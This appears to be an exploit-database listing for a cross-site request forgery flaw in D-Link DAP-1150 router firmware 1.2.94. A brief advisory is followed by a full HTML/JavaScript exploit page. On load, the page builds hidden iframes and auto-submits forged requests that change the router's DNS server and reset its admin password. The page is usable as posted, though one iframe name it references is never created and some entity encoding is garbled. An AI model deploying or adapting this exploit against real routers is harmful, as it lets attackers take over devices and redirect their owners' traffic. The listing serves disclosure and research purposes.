D-Link DAP-1150 Cross-Site Request Forgery Vulnerability

vendor:

DAP-1150

by:

MustLive

7,8

CVSS

HIGH

Cross-Site Request Forgery

352

CWE

Product Name: DAP-1150

Affected Version From: 1.2.94

Affected Version To: 1.2.94

Patch Exists: NO

Related CWE: N/A

CPE: h:d-link:dap-1150

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2012

D-Link DAP-1150 Cross-Site Request Forgery Vulnerability

D-Link DAP-1150 is prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected device. Other attacks are also possible. The vulnerability is caused due to the application's failure to properly validate user-supplied input. A remote attacker can exploit this vulnerability by tricking a user into clicking a malicious link or visiting a malicious website. This will allow the attacker to perform certain administrative actions and gain unauthorized access to the affected device.

Mitigation:

To mitigate this vulnerability, users should avoid clicking on suspicious links or visiting malicious websites.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/51985/info

D-Link DAP-1150 is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected device. Other attacks are also possible.

D-Link DAP-1150 firmware version 1.2.94 is vulnerable; other versions may also be affected. 

<html>
<head>
<title>Exploit for D-Link DAP 1150. Made by MustLive.
http://websecurity.com.ua</title>
</head>
<body onLoad="StartCSRF()">
<script>
function StartCSRF() {
for (var i=1;i<=3;i++) {
var ifr = document.createElement("iframe");
ifr.setAttribute(&#039;name&#039;, &#039;csrf&#039;+i);
ifr.setAttribute(&#039;width&#039;, &#039;0&#039;);
ifr.setAttribute(&#039;height&#039;, &#039;0&#039;);
document.body.appendChild(ifr);
}
CSRF1();
setTimeout(CSRF2,1000);
setTimeout(CSRF3,2000);
}
function CSRF1() {
window.frames["csrf3"].document.body.innerHTML = &#039;<form name="hack"
action="http://www.example.com/index.cgi"; method="get">\n<input type="hidden"
name="v2" value="y">\n<input type="hidden" name="rq" value="y">\n<input
type="hidden" name="res_json" value="y">\n<input type="hidden"
name="res_data_type" value="json">\n<input type="hidden"
name="res_config_action" value="3">\n<input type="hidden"
name="res_config_id" value="7">\n<input type="hidden" name="res_struct_size"
value="0">\n<input type="hidden" name="res_buf"
value="{%22manual%22:true,%20%22ifname%22:%22%22,%20%22servers%22:%2250.50.50.50%22,%20%22defroute%22:true}">\n</form>&#039;;
window.frames["csrf3"].document.hack.submit();
}
function CSRF2() {
window.frames["csrf4"].document.body.innerHTML = &#039;<form name="hack"
action="http://www.example.com/index.cgi"; method="get">\n<input type="hidden"
name="res_cmd" value="20">\n<input type="hidden" name="res_buf"
value="null">\n<input type="hidden" name="res_cmd_type" value="bl">\n<input
type="hidden" name="v2" value="y">\n<input type="hidden" name="rq"
value="y">\n</form>&#039;;
window.frames["csrf4"].document.hack.submit();
}
function CSRF3() {
window.frames["csrf2"].document.body.innerHTML = &#039;<form name="hack"
action="http://www.example.com/index.cgi"; method="get">\n<input type="hidden"
name="v2" value="y">\n<input type="hidden" name="rq" value="y">\n<input
type="hidden" name="res_config_action" value="3">\n<input type="hidden"
name="res_config_id" value="69">\n<input type="hidden"
name="res_struct_size" value="1">\n<input type="hidden" name="res_buf"
value="password|">\n</form>&#039;;
window.frames["csrf2"].document.hack.submit();
}
</script>
</body>
</html>